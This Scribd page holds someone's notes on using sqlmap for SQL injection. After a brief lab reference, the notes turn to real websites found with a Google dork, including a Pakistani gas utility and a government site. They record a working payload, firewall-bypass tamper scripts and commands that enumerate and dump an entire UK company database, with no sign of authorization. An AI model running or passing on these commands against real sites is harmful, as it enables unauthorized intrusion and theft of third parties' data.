Scribd
Upload
310 views5 pages

SQLMAP

The document discusses using sqlmap to find and exploit SQL injection vulnerabilities. It provides tips on using sqlmap to discover vulnerabilities, automate the scanning process, specify scanning techniques, view response headers, dump database contents, bypass web application firewalls, and leverage tampering scripts. The document also includes examples of the sqlmap commands used to scan websites, retrieve user and database details, find tables, columns, and dump the entire database contents.

Uploaded by

Quratulain Tariq
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
Download as docx, pdf, or txt
310 views5 pages

SQLMAP

The document discusses using sqlmap to find and exploit SQL injection vulnerabilities. It provides tips on using sqlmap to discover vulnerabilities, automate the scanning process, specify scanning techniques, view response headers, dump database contents, bypass web application firewalls, and leverage tampering scripts. The document also includes examples of the sqlmap commands used to scan websites, retrieve user and database details, find tables, columns, and dump the entire database contents.

Uploaded by

Quratulain Tariq
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1/ 5

SQL Attack

https://tryhackme.com/room/sqlinjectionlm

The key to discovering error-based SQL Injection is to break the code's SQL query by trying
certain characters until an error message is produced; these are most commonly single
apostrophes ( ' ) or a quotation mark ( " ).

Try typing an apostrophe ( ' ) after the id=1 and press enter. And you'll see this returns an
SQL error informing you of an error in your syntax. The fact that you've received this error
message confirms the existence of an SQL Injection vulnerability. We can now exploit this
vulnerability and use the error messages to learn more about the database structure. 

SQL MAP
https://www.youtube.com/watch?v=QsMkQMKsIII

Note: After https://www.sngpl.com.pk/ ,try on http://berkeleyrecycling.org

To find vulnerable site, write dork: inurl:php?id=1

1) To automate (so it won’t ask for yes/no) use -> --batch


2) To specify technique:

Sqlmap –u http://www.abc.com –crawl 3 –technique=”U” (U means union and crawl 3 means crawl
to the 3rd depth)

3) For threads:

4) When the tool can’t find vulnerabilities, it can look for risk by trying the payloads. We can
give value 1, 2,3. It’ll check more severe Payloads by increasing the number from 1-3.

5) When the tool can’t find vulnerabilities, we can increase levels to search for vulnerabilities
for eg going to level ‘2’ it’ll check in the cookie for vulnerabilities and for level ‘3’ it’ll go in to
‘user- agent’ to check. Means we are increasing the range of our testing. We can assign
values from 1-5.
One thing to notice is that by increasing the ‘level’ and ‘risk’ the chances of false positives
can increase.
After the
scan is completed, we can copy the vulnerable URL so to exploit it.

6) Verbosity gives us the details while looking for vulnerabilities.

2- it shows the debugging messages on the screen


3- it shows the payload it is trying
4- shows the http request (in which form it is going)
5- response headers
6- response page’s contents
By default 1 is selected.

To see http
headers.

7) If we have found vulnerable URL, how to exploit it or get more details out of it.
I found the vulnerable URL of
https://www.sngpl.com.pk/
By writing command
sqlmap -u https://www.sngpl.com.pk/ --crawl 2 --batch --threads 5 --risk 2 --level 1

For current user

For DB and hostname

The results I got from the txt file~:


web application technology: JSP
back-end DBMS: Oracle
Payload: pgids=3605' AND 6330=6330 AND
'yeqQ'='yeqQ&pgname=PAGES_NAME_a&secs=ss7xa852op845&cats=ct456712337&artcl=a
rtuyh709123465
WAF/IPS identified as 'NetScaler AppFirewall (Citrix)

8) For database details:

sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 -D Oracle --tables --threads 5

Results:

No tables found in the Oracle database FOR sngpl

Those I tried along with the others:

https://www.mohtasibsindh.gov.pk/index.php?id=1

https://www.minddesign.co.uk/show.php?id=174

http://esjindex.org/search.php?id=1

http://www.gdilabs.com/

9)

Things I tried to bypass WAF for sngpl website:

sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --


tamper="between,randomcase,space2comment" -D Oracle –tables

Another command:

sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --


tamper="between,randomcase,space2comment" --dbms "Oracle" Oracle –schema

https://www.websec.ca/publication/Blog/Bypassing_WAFs_with_SQLMap

https://hacknopedia.com/2022/07/29/sqlmap-tamper-script-collection/

https://securityonline.info/sqlmap-tamper-script-bypassing-waf/
In temper option:
apostrophemask.py,apostrophenullencode.py,appendnullbyte.py,base64encode.py,between.py,blu
ecoat.py,chardoubleencode.py,charencode.py,charunicodeencode.py,concat2concatws.py,equaltoli
ke.py,greatest.py,halfversionedmorekeywords.py,ifnull2ifisnull.py,lowercase.py,modsecurityversion
ed.py,modsecurityzeroversioned.py,multiplespaces.py,nonrecursivereplacement.py,overlongutf8.py,
percentage.py,randomcase.py,randomcomments.py,securesphere.py,sp_password.py,space2comm
ent.py,space2dash.py,space2hash.py,space2morehash.py,space2mssqlblank.py,space2mssqlhash.py
,space2mysqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.p
y,unmagicquotes.py,varnish.py,versionedkeywords.py,versionedmorekeywords.py

10) Working on
https://www.minddesign.co.uk/show.php?id=174
sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --current-user --current-db --
hostname –batch

11) For database details


sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --dbs

database has some default files in “information_schema”

12) To see tables


sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --tables

13) To see all data of any table


sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T
modern_cat –dump
14)

To see columns and their data types

sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T modern_cat –


columns

14) To dump all data


sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --dump-all

You might also like